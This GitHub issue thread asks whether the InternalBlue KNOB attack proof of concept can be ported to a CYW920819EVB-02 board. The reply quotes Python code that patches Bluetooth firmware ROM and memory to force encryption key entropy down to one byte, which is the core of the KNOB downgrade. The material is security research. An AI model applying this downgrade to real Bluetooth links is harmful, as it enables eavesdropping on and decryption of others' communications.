
Will this board work with "KNOB" - CYW920819EVB-02

Open LHKST opened this issue 3 years ago • 1 comments

Hi

I have a CYW920819EVB-02 board and want to use it to perform the KNOB attack. However, I notice that there isn't any code suitable for this board. I wonder if I can just run the code for CYW20735?

Many thanks

LHKST, Mar 23 '21 03:03

Technically yes, but you need to extract two addresses from the ROM and match them to adapt this part of the POC:

https://github.com/seemoo-lab/internalblue/blob/master/examples/eval_cyw20735/KNOB_PoC.py#L37

```python
# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x7402A)  # connection struct key entropy
internalblue.patchRom(Address(0x7402A), patch)

# modify global variable for own setting
internalblue.writeMem(0x280F13, b'\x01')  # global key entropy
```

jiska2342, Mar 23 '21 11:03